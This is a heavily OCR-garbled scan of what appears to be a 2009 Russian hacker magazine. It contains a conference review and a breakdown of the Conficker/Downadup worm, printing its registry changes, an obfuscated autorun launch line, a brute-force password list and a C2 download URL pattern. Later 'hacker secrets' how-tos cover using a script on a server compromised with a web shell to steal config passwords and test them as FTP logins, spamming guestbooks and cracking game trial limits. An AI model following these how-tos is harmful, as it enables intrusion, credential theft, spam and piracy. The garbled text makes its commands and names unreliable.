ледних версиях ѴѴіпсІоѵѵз подсистема обеспечения сессий 
пользователей. 

^ ВКУСНЫЕ ДОКЛАДЫ ДЛЯ РАЗРАБОТЧИКА 

Мне, как программисту, интересно было послушать доклады 
о нововведениях языка С# и новых возможностях среды 
разработки, включая расширения к ЫЫО. Любопытно 
было послушать о функциональном языке Р#, который 
разрабатывает МісгозоО:. Веб-программисты не останутся 
равнодушными, посмотрев доклад о А5Р4. 0 и получив, по- 
мимо нововведений, настоящий манул по использованию 
веб-форм и модели программирования МѴС. Последняя, 
поясню, отделяет код, отвечающий за логику представле- 
ния (внешний вид), от кода бизнес-логики (непосредствен- 
но кода функциональности программы). Специальному 
фреймворку А5РІМЕТ МѴС Егатеѵѵогк, разработанному для 
этого Місгозоіф посвящен отдельный доклад. 



Н «ПЛАТФОРМА» ДЛЯ СИСАДМИНА 

Большое внимание былоуделено серверным продуктам 
МісгозоО:. Целыхтри отличных доклада посвящены новой 
СУБД ЗОБЗегѵег 2008, для которой нашлось место на 
нашем диске в разделе «Разработка». Был также представ- 
лен интереснейший доклад о разработке систем с высокой 
нагрузкой, объясняющий принципы создания с помощью 
встроенных в ѴѴіпсІоѵѵз 5егѵег2008 механизмов Еаііоѵег 
Сіизіегіпд и системы виртуализации Місгозоіі Нурег-Ѵ. 
Крайне полезными в практическом плане мне показались 
доклады про улучшения скриптового языка РоѵѵегЗНеІІ 
2.0, а также использование его для управления различных 
служб. 

Н БЕЗОПАСНОСТЬ 

В компании хорошо осознают, что создать неуязвимую сеть 
невозможно. Но можно до предела осложнить проникно- 
вения хакера, определив узкие места в своей системе. Как 
бытьуверенным, что слабыхзвеньев больше не появится? 

И все это при условии, что клиентские машины работают 
под разными осями? Об этом поведает доклад о внедрении 
ІЧАР, или, по-русски, защиты сетевого доступа. Аеще одно 
выступление посвящено методам борьбы со спамом итроя- 
ми с использованием стандартных средств Ехсбапде Зегѵег 
2007 и специализированного продукта МісгозоО: Еогеітопі: 
Зесигііу. 

В 4РРЕЕ 

Участие на конференции стоит немалых денег, которые 
многим из нас не по карману. Такие расходы, как 
правило, берут на себя руководители продвинутых ком- 
паний, отправляя свои спецов на прокачку и получение 
опыта. Ксчастью, организаторы «Платформы» распро- 
страняют все материалы и видео совершенно бесплат- 
но, а поэтому каждый желающий сможет получить свой 
Іеѵеі-ир. ц-ц 



> Ііпкз 

Материалы конфе- 
ренции, которые 
не попали на диск, 
можно скачать с 
официального сайта 
«Платформы»: 
ЬЦр://рІа^огта2009.ги. 



> ѵѵагпіпд 

Надо сказать, что 
первые конфы назы- 
вались ТесЬЕб, а под 
лейблом «Платфор- 
мы» конференция 
стала проводиться 
только с 2002 года. 



> СІѴСІ 

На дискеты найдешь 
видео и презентации 
наиболее интерес- 
ных, с нашей точки 
зрения, докладов 
этой конференции. 
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Карта заражения Ооѵѵпасіир’ом на 20 января от антивирусной лаборатории Зутапіес 



Решение от Е-5есиге сумело определитьзаразудаже в 
обфусцированном Аікогип.іпЕ 



заражения систем является эксплуатирование серьезной 
дыры в РРС-службе Винды (что-то знакомое, правда?). Патч 
вышел несколько месяцев назад, но коль уж пользователь 
поленился то гда уста н о в ить а п де йт, то и н е ч е го дел ать это 
теперь. Первым делом червь отключает службу автомати- 
ческих обновлений — ѴѴіпсІоѵѵз Аікотабс ІІрсІаІеЗегѵісе 
(ѵѵиаизегѵ). У пользователя по-прежнему остается возмож- 
ность скачать патч вручную —тем более, отом, что необхо- 
димо поста в ить за платку под номером М508-67, трубят на 
каждом углу. Но и здесь — облом. Червь используетеще один 
тривиальный прием. Перехватывая вызовы АРІ-функций, 
отвечающихза работу с БЫЗ, он препятствуетобращению к 
нежелательным для него доменам. Всякий раз, когда, напри- 
мер, браузер пытается выполнить ПЫЭ-запрос, вызывая фун- 
кции ВЫ5_0иегу_А, ВЫ5_0иегу_ѴѴ или ВЫ5_0иегу_ѴѴ, червь 
проверяет, нежелаетли юзер обратиться на запрещенный 
сайт. Под раздачу попада ют все домены, указывающие своим 
названием на принадлежность ксерверам МісгозоТС или рас- 
пространенныхантивирусных компаний и некоторым другим 
ресурсам. Просто для примера, блокируются все сайты со 
следующими словами в названии: 



тісгозокк 

зушапСес 

погСоп 

тсакее 

кгепйтісго 

зоркоз 

рапсіа 

аѵазк 

аѵіга 

аѵр 

аѵд 

казрегзку 

к-ргок 

пой 
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Хорошийтрюк: добавить мусора в аікогип.іпб чтобы все 
антивирусы остались в пролете 



автоматической системы для настройки стека ТСР/ІР, кото- 
рая тутже подпортит жизнь. Поэтому, обнаружив, что попал 
в ѴІ5Іа, червяктутже отключает эту функцию, выполнив 
консольную команду: 

пекзк іпкегкасе Сер зек дІоЬаІ 
аикокипіпд=с!ізаЬ1ес1 

Ж РЕЦЕПТ 3: 

ИСПОЛЬЗОВАТЬ РАЗНЫЕ СПОСОБЫ РАСПРОСТРАНЕ- 
НИЯ 

Большинство червей используюттолько один способ рас- 
пространения — создатели плохо штудировали учебники, в 
отличие от автора Ооѵѵпабир. Наш червь использует сразу 
три метода: 

1. через «сетевое окружение», перебирая пароль админис- 
тратора ксистемной шаре АРМІЫф; 

2. используя эксплоит для уязвимости 0867, найденной во 
всех версиях ѴѴіпбоѵѵз; 

3. через внешние носители, используя автозапуск. 

В итоге получаем эффект синергии! Разберем каждый из 
способов более подробно. 



> Ііпкз 

• Описание ошибки 
в сервисе «Служба» 
можно прочитать 
здесь: 

ѵѵѵѵѵѵ.тіегозоііеопп/ 

іесЬпеі/зесигііу/ 

ВиІІеііп/М508-067. 

тзрх 

• Списокдоменов от 
Р-5есиге, которые 
вероятно будут 
использоваться для 
управления ботнетом 
в феврале (хорошо бы 
занести в блок-лист): 
ѵѵѵѵѵѵЧ-зесиге.сопп/ 
уѵеЫод/а гсбіѵез/ 
Роѵѵпабир Ротаіп 
Віоскіізі РеЬгиагу.Ш 



Этот всем известный прием работает идеально. Жертвы 
бьются в конвульсиях, не имея возможности даже скачать 
антивирус и обновить базы. Помимо этого отключаются 
еще и центр обеспечения безопасности ѴѴіпбоѵѵзЭесигіІу 
СепіегЭегѵісе (ѵѵзсзѵс), и сервис ѴѴіпбоѵѵз РеіюпсІегЭегѵісе 
(ѴѴі п РебепсІ) . А чтобы пользователей не доставал МісгозоіЧ 
по поводу возникающих в системе ошибок (а они дейст- 
вительно довольно часто возникают после заражения 
системы), отключаются 2 сервиса ѴѴіпбоѵѵз Еггог РерогРшд 
Эегѵісе. Тут есть еще важный нюанс, который показывает, 
что создатели подготовились, можно сказать, на «отлично». 
Под Ѵізіа’ой эти сервисы так просто не отключить ввиду 



Н РЕЦЕПТ 4: 

РАСПРОСТРАНЯТЬСЯ ЧЕРЕЗ СЕТЕВОЕ ОКРУЖЕНИЕ 

Прием на самом деле очень простой. Червь используетсистем- 
ную функцию N еЕВ е гл/е гЕ пит, чтобы найти «соседние компью- 
теры», и пытается залогиниться на каждую систему. Сначала 
используются параметры учетной записи пользователя, но 
это работает толь ко втом случае, если на сторонней машинеу 
него есть права администратора. Этот вариант чаще всего про- 
валивается. Далее червь, через АРІ-функцию ЫеШзегЕпит, 
получаетсписок пользователей на удаленном компьютере и 
начинает брутфорсить по ним, используя небольшой словарик, 
в который входят распространенные пароли. Например: 
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РАЗБИРАЕМСЯ С ООѴѴМАОУР — ЧЕРВЕМ, ПРИГОТОВЛЕННЫМ ПО ПРАВИЛЬНОМУ РЕЦЕПТУ 



Боѵѵпасііір, СопЯскег, Кісіо — червя, нашумевшего в январе, называют по-раз- 
ному. Важно одно: новой малваре за несколько дней удалось заразить мил- 
лионы компьютеров, и эпидемия продолжается. Что же такого внутри этого 
червя и как ему все это удалось? 



абавный факт: несмотря на огромное количество зара- 
женных, многие даже не подозреваютоб эпидемии. Вирус 
практически ни как себя не проявляет — попробуй сходу 
определи, что твой компьютер в ботнете :]. По оценкам 
разных антивирусных компаний, Ооѵѵпасіир заразил от 9 до 1 1 милли- 
онов машин. Учитывая развитие средств защиты, это кажется нереаль- 
ной цифрой. Да, все вокруг трубят, что виновата критическая ошибка 
в Винде, заплатку для которой МісгозоЙ выпустила еще в феврале. 
Нодаже при наличии убойного эксплоита такой огромный ботнетмог 
собратьтолько неординарный вирус, с приемами которого антивирусы 
еще не сталкивались. Однако при более внимательном рассмотрении 
легко выясняется, что Ооѵѵпасіир — малварь довольно пионерская. И 
правильнее ее назвать — грамотно приготовленным червем, собран- 
ным подавно известным рецептам — с небольшой, недейственной 
импровизацией. Какие рецепты использовали создатели? Вот в этом 
мы и разберемся. 

ёЗ РЕЦЕПТ 1: 

НЕЗАМЕТНО РАЗМЕСТИТЬСЯ ВО МНОГИХ ЧАСТЯХ СИСТЕМЫ 

Заразив машины, червь копирует свое тело во вполне привычные 
места: 

• %8узСет%\ [Капсіот] . <3.11 

• %Ргодгат Рі1ез%\ІпСегпеЦ Ехр1огег\ [Капсіот] . сЗ.1 1 



• %Ргодгат Рі1ез%\Моѵіе Макег\ [Капсіот] . сііі 

• %АІ1 ІІзегз Арріісакіоп Бака%\ [Капсіот] .сііі 

• %Тетр%\ [Капсіот] .сііі 

• % 8уз к ет%\ [Капсіот] . Ртр 

• %Тетр%\ [Капсіот] .Стр 

Вместо маскировки под какой-нибудь системный файл (которая с 
появлением все более интеллектуальных менеджеров задач становится 
бесполезной) в имени файла используется случайно сгенерированный 
набор символов. Одним из простейших, нозачастую действенных при- 
емов для отлова свежей малвари в системе является банальный поиск 
файла по свежей дате создания. Чтобы не попасться на такую простую 
уловку, каждому из созданных файлов червь присваиваетзначения 
даты, взятые с файла %5уз1:ет%\кегпе132.сІІІ. После этого производится 
ряд изменений в реестре, дабы обеспечитьзапускчервя. Носмеюзаве- 
рить, никаких подозрительных имен процессов в менеджере задач не 
найти — Ооѵѵпасіир аттачит себя в зѵсНозІ.ехе, ехріогег.ехе и зегѵісез.ехе. 

И РЕЦЕПТ 2: 

ОБЕЗОРУЖИТЬ СИСТЕМУ, ОТКЛЮЧИВ МЕШАЮЩИЕ СЕРВИСЫ 

Чтобы комфортно обитать в системе и делать все, что заблагорассудится, 
червю необходимо немного подстроить ее под себя. Самая главная задача 
— как можно дольше продержаться в системе. Большинство действий 
направлено именно на это. Забегая вперед, скажу, что одним из способов 
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Пример Ооѵѵпасііір’а показал, насколько просто отключаются многие 
защитные механизмы Винды. Червь удаляет несколько ключей из реестра 
для того, чтобы деактивировать Зесигпу СепГег ИоіШсаІііопз и отключить 
автозапуск ѴѴіпбоѵѵз Оебепбег. Для обхода файрвола создается следующая 
запись в реестре — дабы система могла скачать копию червя: 



НКЕМ\8У8ТЕМ\СиггепЦСопЦго13еЦ\8егѵісез\3]тагебАссезз\ 
Рагатебегз\Рігечл;а1ІРо1ісу\51:апбагбРго:Е:і1е\ 
СІоЪаІІуОрепРогЦзХЬізЦ , [РогРЫитЪег] :ТСР = « [ РогРЫишЪег ] : 
ТСР : *ЕпаЫеб: [гапбош]» 



А для маскировки в системе червь сначала удаляет все точки восстановле- 
ния системы, созданные пользователем, а затем немного колдует в реестре: 

НКЕУ_ЪОСАЪ_МАСНІЫЕ\ЗОЕТМАНЕ\МісгозоеьМл?іпсаоѵ73\ 
СиггепРѴегзіоп\ехр1огег\Абѵапсеб\Ео1бег\Ніббеп\8Н0 
Ѵ/АЬЬСІіескебѴаІие = бтлгогб: 000 00000 

НКЕУ_Ъ0САЬ_МАСНІНЕ\80Е іГ ШАРЕ\Місгозоеі:\Шп(іо^з ЫТ\ 
СиггепЕѴегзіопХЗѵсНозЕ , пекзѵсз = %Ргеѵіоиз бака% апб 
%Капбот% 



[имя пользователя] 

[имя пользователя] [имя пользователя] 
[имя пользователя наоборот] 

111111 и прочие простые числовые пароли 
фѵегбу 
и т . д . 



З.К подсчитать 

ГН 



дшлшшкто. 




Как выяснить, сколько компьютеров было поражено 
червем? Ведь нет никакого специального сервиса 
для хакеров, который вел бы статистику, скажем, 
как Соо^іе Апаіуііісз для обычных веб-сайтов :) . Не 
являясь владельцем ботнета, об общем числе зомби 
можно лишь строить предположения, однако, в 
случае с Ооѵтабир все намного хитрее. Как уже было 
сказано, для управления ботнетом используется 
каждый день 250 доменов, которые генерируются по 
специальному алгоритму в зависимости от текущей 
даты. Некоторые антивирусные лаборатории, в том 
числе Р-Зесиге и Зуташес, опубликовали в своих 
блогах результаты интересного эксперимента. 
Расковыряв в теле червя алгоритм генерации, ребята 
зарегистрировали некоторые из возможных доменов 
и стали отслеживать подключения к ним. Каждое из 
подключений представляет собой обычный НТТР- 
запрос, который отображается в логе веб-сервера 
примерно следующей записью: 

х.х.х.х [Іб/бап/2009 : 09 : 45 : 09 -0700] 

«СЕТ /зеагсК?д=29 НТТР/1.0» 404 282 »- 
» «МозіІІа/4 . 0 (сошрабіЫе; МЗІЕ 6.0; 
Мпбомз Ж 1 5.1; 8ѴІ ) » 




> ѵѵагпіпд 

За использование 
полученной инфор- 
мации в незаконных 
целях редакция 
ответственности не 
несет. 



В случае, если червьудачно обратится к расшаренному 
ресурсу, он создает копию себя в папке АО М I Ы$, опять же 
со случайным именем файла: 

\\ [Зегѵег НозР Ыаше] \АБМШ$\8узбет32 \ [гапбош 
бііепате] . [гапбош ехбепзіоп] 

Затем на удаленной системе создается ежедневное зада- 
ние в планировщике, с помощью которого выполняется 
следующая команда, запускающая червя: 

гшіб1132.ехе [гапбош бііепаше] . [гапбош 
ехкепзіоп] , [гапбош] 




> іп^о 

При обнаружении 
ИРпР-роутера в сети 
червьумеетсам 
открывать необхо- 
димый для даль- 
нейшего заражения 
ЫТр-порт. 



0 РЕЦЕПТ 5: 

РАСПРОСТРАНЯТЬСЯ С ПОМОЩЬЮ ЭКСПЛОИТА 

Понятно, что для масштабного распространения одного 
(всем известного] приема мало — нужна фишка. И такой 
фишкой в Ооѵѵпасіир’е стал эксплоит, который пробивает 
любую непропатченную систему суязвимостью переполне- 
ния буфера М508-067 в сервисе «Сервер». Для этого червь 
отсылаетудаленной машине специальным образом сфор- 
мированный РРС-запрос, вызывающий переполнение бу- 
фера при вызове функции ѵѵс5сру_5 в библиотеке пе1арі32. 
сіи. На компьютере запускается специальный код-загруз- 
чик, который скачиваетсзараженной машины исполняе- 
мый файл червя и запускает. Чтобы это реализовать, червь 
сначала коннектится к сайтам Шр:/Ал/ѵѵѵѵ.деІтѵір.огд . 
Шр://сбескір.сІѵпсІп5.ога и некоторым другим с целью вы- 
яснить внешний ІР-адрес системы (%Ех1:егпаІІРАсІсІге55%]. 



Но даже имея такую статистику, дать оценку количес- 
тва зараженных компьютеров очень сложно. Многие 
из них работают через НАТ и поэтому имеют один и 
тот же ІР. Связка уникальных ІР и ІІзег-А^епі: также 
давала лишь приблизительные результаты. Зато поз- 
же выяснился один интересный момент: параметр 
/зеагс1іЛі= < некоторое число вовсе не является 
случайным, как предполагалось изначально. Он уве- 
личивается каждый раз, когда червь успешно поража- 
ет машину через уязвимость М508-067 — а значит, 
показывает, сколько компьютеров машина заразила 
с момента последнего старта. В примере выше одна 
инфицированная система заразила 29 компьютеров. 
Вот теперь, обработав логи, и собрав информацию 
о самых «плодовитых» червях, можно было сделать 
более точный вывод о количестве заражений. Если 
верить Р-5есиге, эта цифра составляла более 8 милли- 
онов машин на 16 января. Нехило! 



После чего использует его для создания НТТР-сервера на 
случайном порту: 

ТШкр : / /%Ехкегпа1ІРАббгезз% : %КапбошРогР% 

Созданный НТТР-сервер позволяет отправить с зараженной 
системы специально собранные пакеты с эксплоитом на 
другие машины. Так, если эксплоитпробил систему, то ее тут 
же заставляют скачать копию червя с первой зараженной 
системы по НТТР Какправило.тело червя имеет одно из 
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Некоторые распространенные пароли, входящие в брутлист 



следующих расширений: Ьтр, дііщред, рпд. Адлятого чтобы быстрее рас- 
пространяться, червь делает небольшую поправку в реестре, значитель- 
ноувеличивая количество возможныхТСР-подключений: 

НКЕУ_ЬОСАЬ_МАСНШЕ\ЗУ5ТЕМ\СиггегШСогЩго13еС\Зегѵісез\ 

Тсрір\РагатеСегз 

"ТсрЕитСоппесСіопз " = йюотй: ОхООРРЕРРЕ 

Как и заведено, заразив систему, червь делает невозможным повтор- 
ное эксплуатированиеуязвимости (например, другими вирусами), 
перехватывая вызовы функции ЫеірѵѵРаІйСапопісаІіге. 

Н РЕЦЕПТ 6: 

РАСПРОСТРАНЯТЬСЯ НА ВНЕШНИХ УСТРОЙСТВАХ 

Каждый, кто пользуется ІІ5В-девайсами, хотя бы раз, но сталкивался с 
вирусами, которые переносятся на флешках. Причиной тому — система 
автозапуска, но о проблеме знают как сам и пользователи, так и анти- 
вирусы, которые с грехом пополам научились обнаруживать подозри- 
тельные файлы аійогип.іпі Казалось бы, Ооѵѵпаб и р должен обломаться 
и не сильно рассчитывать на этотспособ распространения, ан нет! 
Вместо обычного АіЛогип.іпб который имееточень маленький размер, 
создатели слегка обфусцировали файл, добавив туда массу мусора и, 
тем самым, обманув многие сигнатурные антивирусы. Для увеличения 
размера можно использовать специальные символы. ѴѴіпсІоѵѵз игнори- 
рует их во время парсинга и отлично понимает оставшуюся корректную 
часть файла, где спрятались строчки для инфицирования системы: 

Ореп=ктгоЬЬ32 . ЕХЕ . \ЕЕСУСЬЕЕ\з^дѵзд . ѵтпх 

Несложно догадаться, что команда выполняетзапуск 0І_І_-ки ^дѵзц. 
ѵтх, которая находится в скрытом каталоге на том подключаемом диске, 
где лежитаійогип.іпб 

В РЕЦЕПТ7: 

ПОЗВОЛИТЬ СКАЧИВАТЬ ЛЮБЫЕ ФАЙЛЫ 

Все инфицированные системы — это ботнет. В случае Ооѵѵпасіир, — бот- 
нет на 8-9 миллионов машин, что в денежном эквиваленте может при- 
носить десятки тысяч долларов в день. Спам, кликботы, ддосы, продажа 
трафика, промышленный шпионаж, прокси, подмена поисковой выдачи 
и еще дюжина другая способов заработать. Нотакой махиной нужно, 
во-первых, управлять, а, во-вторых, каким-то образом использовать. 
Понятно, что втело червя всего функционала неуместить, да и не нужно 
— достаточно предусмотреть возможность загрузки дополнительных 
программ, например, хорошего троя :]. Создатели такую возможность 
предусмотрели и сделали это очень хитро. 



Как избавиться 
оэишрвя вручную 

Я лично рекомендую не полагаться ни на какие сканнеры и 
специальные утилиты, а удалять такую заразу исключительно 
вручную. Как водится, если хочешь что-то сделать хорошо, то 
сделай это сам. Алгоритм такой: 

1 . Во-первых, нужно удалить ключ системного реестра: 
[НКЬМ\8У8ТЕМ\Сиггепі:Сопі:гоІ5ег\5егѵісе5\пеГ5ѵс5]. 

2. Далее удаляем строку «%Зу5Гет%\<гпсІ>.сШ» из значения 
следующего параметра ключа реестра: 

[НКЬМ\ 80 РТѴѴАКЕ\Місго 5 оЛ\ѴѴіпсіоѵѵ 5 ЫТ\СиггемѴег5Іоп\ 
ЗѵсНозг] «пензѵсз». 

3. Ре бутимся. 

4 . После перезапуска нужно удалить оригинальный файл червя 
(его расположение на зараженном компьютере зависит от 
способа, которым программа попала на компьютер) . 

5 . Для этого пытаемся найти и удалить файл: 
%5у5Гет%\<гп<і>.<і11, где <гпсі> — случайная последователь- 
ность символов. 

6. А также килляем следующие файлы со всех съемных носите- 
лей: 

<Х> ЛаіПогип.іпГ 

<Х> :\КЕСУСЬЕК\5-5-3-42-2819952290-8240758988- 
879315005-3665\.ѵтх, где гпб — случайная последователь- 
ность строчных букв, X — буква съемного диска. 

Изначально никакого управления зараженной машиной нет. То есть 
нельзя просто взять и сказать ей : «Скачай трой с та кого-то НТТР-адреса». 
Обычный ход вирус-мейкеров — жестко зашить адресуправляющего 
сервера втело вируса, но какова вероятность, что такой домен проживет 
хотя бы неделю, особенно под натиском многомиллионного ботнета? 
Небольшая. Ктомуже один домен легко закрыть — и в и рус тут же ста нет 
безопасным. Ооѵѵпасіир намного умнее. Червь каждый день использует 250 
разныхдоменов, имена которых, конечноже, внугрьтела не вшиты. Вместо 
этого был придуман специальный алгоритм, позволяющий потекущей дате 
генерировать названия новыхуправляющих доменов, к которым и стучится 
червь. Задача хозяев ботнета — заблаговременно ихзарегистрировать. 
Выглядитэто примерно следующим образом. Сначала Ооѵѵпасіир 
соединяется с одним из несколькихзаданных серверов [ доодіе.сот . 
Ьаісіи.сот. ѵѵЗ.огд и другие) для того, чтобы получить системную дату. 
Полученная дата тутже используется для генерации списка доменов 
( % Р ге сі і сіа Ые 0 о т а і п з I РАсІ сі ге55%) , откуда червь может скачать допол- 
нительные файлы. Он проверяет, перевалила ли дата за 1 января 2009 и 
в случаеуспеха скачивает файлы с адреса, запуская их после загрузки: 

ЪДЦр : //%Ргес1ісЦаЫеБотаіпзІРАс1с1гезз%/зеагс]т?д=%с1 

0 РЕЗЮМЕ 

И что мы имеем в итоге? Качественно сделанный вирус, использующий 
вполне стандартные приемы. Сильно удручаеттот факт, что практически 
все антивирусные компании, которые так привыкли громко заявлять о 
себе, не смогли ему вовремя противодействовать. Это касается даже 
серьезных корпоративных решений, за которые приходилось краснеть 
и, разводя руками, отправлять специалистов для ручного удаления за- 
разы. Особенно меня забавляют инструкции поудалению Ооѵѵпасіир’а, 
которые публикуются на техже самых сайтах антивирусников. Напом- 
ню, все они заблокированы на инфицированных компьютерах. В этих 
же инструкциях — ссылки на закачку специальныхутилит, опять же с 
заблокированных серверов. Классно работаете, ребята ! тг 
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Базу Наск} 

Леонид «вою» отройков Яй ювйШШйіШШІШІ 

/ КОІО@МАІІ_.РШ / / КОМАКОѴ5ІТОЕРЕМСЕ.РШ / 




ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 




ЗАДАЧА: 



| АВТОМАТИЧЕСКИ ЧЕКАТЬ СПИСОК ДРУЗЕЙ 

«ВКОНТАКТЕ» 

РЕШЕНИЕ: 



С ростом популярности социальных сетей растут и наши к ним требо- 
вания. Примером служат десятки самых разнообразныхтулз и скрип- 
тов, представленных на страницах^. Однако сейчас мы рассмотрим 
решение, казалось бы, такой нетривиальной задачи, какавтоматизи- 
рованный чекинг френд-листа «ВКонтакте». Частенько случается так, 
что некоторые из «друзей» попросту самоудаляются из нашего списка, 
естественно, «по-английски» (ака не предупредив]. Отсюда и вполне 
понятноежелание вести регулярный автоматический мониторингсвоего 
френд-листа. Что ж, в этом нет ничего сложного. Единственное, что нам 
понадобится, — скрипт«РРІЕМ05 СОМТРОІ.» от ЕпоТ_РоТо5кЮп’а и 
подходящий рЬр-хостинг. Для начала ознакомимся с самим скриптом и 
его возможностями. Итак, утила умеет: 



• Вести общий список количества друзей 

• Проверять, сколько добавилось и удалилось друзей с мо- 
мента последней проверки 

• Отправлять уведомление о результатах на мыло 

Как ты уже до га да лея, скрипт создает файл, в котором хранятся данные 



провероки используетего для сравнения при каждом следующем чеке. 
Теперь рассмотрим алгоритм действий для успешной установки скрипта: 

1. Сливаем скрипте нашего ДВД; 

2. Открываем сорец и правим интересующие нас строки: 

• Указываем в значениях переменных свой іб, мыло и пароль в начале 
скрипта; 

•Переменная $оп_шаі1 включает/выключает отправку результатов на 

МЫЛО (0-ВЫКЛ, 1 - В КЛ ] ; 

•Переменная $ѵлгібе_погезиІС отвечаетза опцию записи данных в 
файл (0-не вписывать - по-дефолту/ 1 -вписывать]. 

3. Ищем/покупаем/ломаем сервер сналичиемРНР=>5 версии, БіЬСигІ и 
Сгоп (при необходимости]. 

4 . Заливаем отредактированный скриптна наш сервер и запускаем его 
5 . После запуска скрипта создаем файл данных и заносим туда первую 
запись, с которой скрипт будет сверяться в дальнейшем. Для этого жмем 
на линк«Очистить/создатьлог» и радуемся. 

Вот, собственно, и все, удачи :]. 



Чекаем френд-лист «ВКонтакте>> 


| 0 контакте 




» н 


І^Тк-МЫН. ЙМя 





№2 



ІЗАДАЧА: 



СЕРВЕРЕ 

РЕШЕНИЕ: 

Одной из первоочередныхзадач послезаливки веб-шелла будетпоиск 
различных файлов конфигурации на атакуемом сервере. Не секрет, что в 
конфигах можно найти множество аккаунтов: начиная от пользователей 
СУБД и заканчивая фтп-акками. Но парсить все доступные каталоги 
вручную - дело неблагодарное. Предлагаю воспользоваться специально 
предназначенным для этого инструментом — рЬрСопЯдБру от р-гапде & 
$ге(бтЗг. Скрипт предназначен для автоматизированного поиска кон- 
фигов в каталогах вида /Ьоте/имя_юзера/риЫіс_Ы:пп[ и всех подката- 
логах, если они доступны для чтения пользователю, с правами которого 
запущен скрипт. Послетого, какскрипт находит конфиг, он ищетпароль 
и в случаеуспеха пробуетсоединиться с фтп, используя в качестве ло- 
гина имя юзера, в дире которого был найден конфиг, а в качестве пасса 
— обнаруженный в конфиге пароль. Если авторизация на фтп пройдет 



удачно, скриптуведомиттебя о найденном фтп-акке. Для успешного 
запуска скрипта необходимо: 

1. Отредактировать сорец, указав (пожеланию] имена конфигов для 
поиска: 

($бі1е== ' сопбід.рйр 1 ) 

ог ($бі1е== ' сопбід. іпс .рйр ' ) 

ог ( $бі1е== ' сопб .рЬр ' ) 

ог ( $бі1е== ' зеббіпдз . рйр 1 ) 

ог ( $бі1е== ' зебир . рЬр ' ) 

ог ( $бі1е== 1 бЬсопб . рйр 1 ) 

ог ($бі1е== 1 бЬсопбід.рйр 1 ) 

ог ( $бі1е== 1 6Ь . іпс . рйр 1 ) 

ог ( $бі1е== 1 бЬсоппесб .рЪр 1 ) 

ог ( $бі1е== ' соппесб .рЬр ' ) 

ог ( $бі1е== 1 іпбех . рЬр ' ) 

ог ( $бі1е== ' сошшоп . рйр ' ) 

ог ( $бі1е== ' сопбід_д1оЬа1 . рйр ' ) 

ог ($бі1е== ’бЬ.рЬр' ) 

ог ( $бі1е== ' соппесб . іпс .рйр 1 ) 
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ог ( $:Еі1е== ' сІЪсоппесС . іпс . ркр ' ) ) 

2 . Изменить 24 строку скрипта: 

$<ііг 2 = ' /Тюте/ ' . $изегпаше. 1 /риЫіс_Ыіт1/ ' ; 



И 43 стоку, указав валидные пути к веб-каталогам пользователям: 
$раТЪ. = ' /Тюте/ ' .$изег. ' /риЫіс_Ыіш1/ ' ; 

3. Залить скрипт на атакуемый сервер и запустить через браузер. 



№3 



АДАЧА: 



| ПРОСПАМИТЬ ГОСТЕВУХУ МВООК ПО СОБСТВЕННОМУ 

СПИСКУ 

РЕШЕНИЕ: 

Зачастую возникает потребность в спаме/флуде какой-либо гостевухи. 
Универсального спамера не существует в силу особенностей каждого 
конкретного движка. Но в случае с известной гостевухой МВоок все 
намного проще :). Разобраться в решении задачи нам поможет МВоок- 
спамер от ЫідЫтаге, предназначенный для автоматической рассылки 
по гостевым книгам МосІ-ЗТе (МВоок). Итак, что нам нужно: 

1. Сама прога, которую ты можешьсмело взятье нашего ДВД :). 

2 . Гостевухи на движке 



4 . Запускаем тулзу. Указываем путь к файлу со списком сайтов, заполня- 
ем все поля, печатаем свое сообщение — и вперед :]. 

5 . При рассылке следуетучитывать ряд факторов, влияющих на качество 
работы скрипта: 

О Модерация сообщений в гостевухе; 

2) Неправильно заполнены поля, в частности Е-таіІ и СНІ_; 

3) Незаполненные обязательные поля (желательно заполнять все); 

4 ) Наличие капчи; 

5 ) Бан твоего ІР. 

В большинстве гостевух данного типа отсутствует капча, поэтому про- 
блем возникнуть не должно. А в бесплатных демо-версиях с официаль- 
ного сайта нетвообще ничего, что могло бы осложнить тебежизнь :). Но 
помни, спам - это плохо! 



МВоок (отлично ищут- 
ся в Гугле, например, 
запросом вида 
«МВоок + іпигі : 
сді-Ьіп/дЬ/дЬ»). 

3. В каталоге с утил ой 
создай файл зіТез . 
ТхТ, в котором нужно 
указать сайты, содер- 
жащие гостевуху: 

ЫаЫаЫа . сот 

хехехех . пеТ 

ТагдеТ . огд 

То есть, вбить надо 
исключительно 
домены, причем, без 
«кТТр: //» и путей к 
гостевухам. 



Спамим гостевухи 



Имя* 
Етаіі: 
Ш1: 
Г ород: I 
ІС<?: 



Спаммер гостевых книг на движке МосНзіІе (МВоок) І_ 

Сообщение* 



Цвет шрифта: [ 



Размер шрифта: 



(от 8 до 25) 



Спамить 



Путь к файлу со списком сайтов: 

| [укажите гщгь к Файлу] 



Выбрать 



РоѵѵегесІ Ьу №д№таге 
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ІАДАЧА:| 



АІ_АѴѴАК.ІШ 

РЕШЕНИЕ: 

Кто-то тратит драгоценное время на партию «Косынки» или «Пауч- 
ка», кто-то шарит по «Одноклассникам», а кто-то окунается в мир 
онлайн-игрушек. Сегодня мы рассмотрим очень интересные игры 
на сайте ѵѵѵѵѵѵ.аіаѵѵаг.ги . К сожалению, в них во всех зашит механизм 
ограничения времени. Система триала следующая: 60 минут халявы, 
за остальное нужно слать 5М5, которое стоит $3. Неохота платить? 
Сейчас я расскажу, как взломать такую игру и играть нахаляву сколь- 
ко хочется. 

Итак, чтобы убрать лимит по времени из игр Аіаѵѵаг: 



1. Качаем (или берем с диска) любую игру от ЫеѵоЗоІТ и устанавливаем ее. 
2. Запускаем. Вылезетокошко, говорящее, чтоу насещебО минутигры. 
Жмем на кнопку «Играть» и ожидаем, пока запустится игра. 

3. Ждем несколько секунд и жмем <АІТ+ТАВ> - открывается диспетчер 
задач. Там ищем процесс с именем формата «?????. Стр». Сразу отвечу 
на вопрос: «А что это за процесстакой?». Это имя исполняемого файла 
игры. 

4 . Отрываем поиск, вбиваем имя процесса и жмем «Найти». Находим 
файл. Тыкаем по нему правой кнопкой мыши, выбираем «Открыть содер- 
жащую объект папку» и видим этот файл. Копируем его в куда-нибудь, 
переименовываем в «ЫаЫа . ехе». 

5 . Все! Из игры можно выйти. Чтобы играть, копируем файл назад (в 
переименованном виде) и запускаем. Видим игру и радуемся, что она не 
ограничивает нас во времени! 

По собственному опыту могу сказать, что прочие игры взламываются 
также. 
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ЗАДАЧА 



^НАДЕЖНО ЗАШИФРОВАТЬ СОДЕРЖИМОЕ ЖЕСТКО- 
ГО ДИСКА 

